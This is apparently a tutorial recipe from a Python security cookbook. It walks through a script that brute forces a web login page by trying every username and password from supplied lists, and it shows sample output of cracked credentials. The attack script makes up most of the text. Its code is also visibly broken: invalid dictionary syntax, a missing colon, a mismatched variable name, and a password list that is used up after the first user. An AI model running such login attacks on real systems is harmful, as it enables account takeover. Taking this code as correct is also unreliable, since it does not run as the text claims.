Brute forcing may not be the most elegant of solutions, but it will automate what could be a potentially mundane task. Through the use of automation, you can get tasks completed much more quickly, or at least free yourself up to work on something else at the same time.
To be able to use this recipe, you will need a list of usernames that you wish to test and also a list of passwords. While this is not the true definition of brute forcing, it will lower the number of combinations that you will be testing.
Note
If you do not have a password list available, there are many available online, such as the top 10,000 most common passwords on GitHub here at https://github.com/neo/discourse_heroku/blob/master/lib/common_passwords/10k-common-passwords.txt.
The following code shows an example of how to implement this recipe:
#brute force passwords
import sys
import urllib
import urllib2
if len(sys.argv) !=3:
print "usage: %s userlist passwordlist" % (sys.argv[0])
sys.exit(0)
filename1=str(sys.argv[1])
filename2=str(sys.argv[2])
userlist = open(filename1,'r')
passwordlist = open(filename2,'r')
url = "http://www.vulnerablesite.com/login.html"
foundusers = []
FailStr="Incorrect User or Password"
for user in userlist:
for password in passwordlist:
data = urllib.urlencode({"username="user&"password="password})
request = urllib2.urlopen(url,data)
response = request.read()
if(response.find(FailStr)<0)
foundcreds.append(user+":"+password)
request.close()
if len(foundcreds)>0:
print "Found User and Password combinations:
"
for name in foundcreds:
print name+"
"
else:
print "No users found
"The following shows an example of the output produced when the script is run:
python bruteforcepasswords.py userlists.txt passwordlist.txt Found User and Password combinations: root:toor angela:trustno1 bob:password123 john:qwerty
After the initial importing of the necessary modules and checking the system arguments, we set up password checking:
filename1=str(sys.argv[1]) filename2=str(sys.argv[2]) userlist = open(filename1,'r') passwordlist = open(filename2,'r')
The filename arguments are stored in variables, which are then opened. The r variable means that we are opening these files as read-only.
We also specify our target and initialize an array to store any valid credentials that we find:
url = "http://www.vulnerablesite.com/login.html" foundusers = [] FailStr="Incorrect User or Password"
The FailStr variable in the preceding code is just to make our lives easier by having a short variable name to type instead of typing out the entire string.
The main course of this recipe lies within a nested loop in which our automated password checking is carried out:
for user in userlist:
for password in passwordlist:
data = urllib.urlencode({"username="user&"password="password })
request = urllib2.urlopen(url,data)
response = request.read()
if(response.find(FailStr)<0)
foundcreds.append(user+":"+password)
request.close()Within this loop, a request is sent including the username and password as parameters. If the response doesn't contain the string indicating that the username and password combination is invalid, then we know that we have a valid set of credentials. We then add these credentials to the array that we created earlier.
Once all the username and password combinations have been tried, we then check the array to see whether there are any credentials. If so, we print out the credentials. If not, we print out a sad message informing us that we have not found anything:
if len(foundcreds)>0:
print "Found User and Password combinations:
"
for name in foundcreds:
print name+"
"
else:
print "No users found
"